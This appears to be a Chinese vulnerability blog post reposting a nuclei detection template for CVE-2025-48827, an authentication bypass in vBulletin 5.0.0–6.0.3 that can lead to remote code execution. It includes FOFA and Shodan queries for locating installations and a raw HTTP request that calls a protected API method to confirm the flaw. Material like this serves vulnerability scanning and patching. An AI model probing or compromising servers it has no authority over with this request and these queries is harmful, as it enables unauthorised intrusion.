vBulletin 500-603 - Authentication Bypass

漏洞信息

漏洞名称: vBulletin 5.0.0-6.0.3 - Authentication Bypass

漏洞编号:

  • CVE: CVE-2025-48827

漏洞类型: 权限绕过

漏洞等级: 严重

漏洞描述: vBulletin是一款广泛使用的论坛软件,支持多种功能如帖子发布、用户管理等,常见于企业和个人网站中。该软件在5.0.0至5.7.5版本以及6.0.0至6.0.3版本中存在一个认证绕过漏洞。此漏洞源于在PHP 8.1或更高版本上,未认证的攻击者可以访问受保护的API控制器,从而远程调用受保护的方法。这是由于PHP 8.1对ReflectionMethod::invoke()及相关方法的内部调整,默认允许通过PHP的Reflection API调用受保护/私有方法。成功利用此漏洞的攻击者可以以Web服务器用户的身份执行任意系统命令,导致系统完全被控制。此漏洞的利用无需认证,且可以远程自动化执行,因此危害性极高。建议用户升级到vBulletin 6.0.4及以上版本,并在升级前避免使用PHP 8.1或更高版本。

产品厂商: vbulletin

产品名称: vbulletin

影响版本: 5.0.0 <= version <= 5.7.5, 6.0.0 <= version <= 6.0.3

搜索语法: app=”vBulletin”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/66d25cb89009a2cd5c26275197ad828f28392212/http%2Fcves%2F2025%2FCVE-2025-48827.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53

id: CVE-2025-48827

info:
  name: vBulletin 5.0.0-6.0.3 - Authentication Bypass
  author: pszyszkowski
  severity: critical
  description: |
    vBulletin 5.0.0 through 5.7.5 and 6.0.0 through 6.0.3 contain an authentication bypass caused by unauthenticated access to protected API controllers on PHP 8.1 or later, letting unauthenticated attackers invoke protected methods remotely.Starting from PHP 8.1, due to an internal adjustment to handling of ReflectionMethod::invoke() and similar methods, it now allows — by default — invocation of protected / private methods when using PHP's Reflection API.
  impact: |
    Successful exploitation allows unauthenticated remote attackers to execute arbitrary system commands as the web server user, resulting in full system compromise.
  remediation: |
    Upgrade to vBulletin 6.0.4+ before upgrading to PHP 8.1.
  reference:
    - https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
    - https://nvd.nist.gov/vuln/detail/CVE-2025-48827
  classification:
    cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-48827
    cwe-id: CWE-424
  metadata:
    verified: true
    max-request: 1
    vendor: vbulletin
    product: vbulletin
    fofa-query: app="vBulletin"
    shodan-query: http.component:"vBulletin"
  tags: cve,cve2025,rce,vbulletin,intrusive

variables:
  rand_string: "{{to_lower(rand_base(5))}}"
  rand_value: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /ajax/api/ad/wrapAdTemplate HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        template={{rand_string}}&id_name={{rand_value}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type,'application/json')
          - contains_all(body,'<div class=','{{rand_string}}','{{rand_value}}','/div>')
        condition: and


Github Poc
#projectdiscovery/nuclei-templates:github issues #权限绕过
vBulletin 500-603 - Authentication Bypass
http://example.com/2025/07/09/github_2792700347/
作者
lianccc
发布于
2025年7月9日
许可协议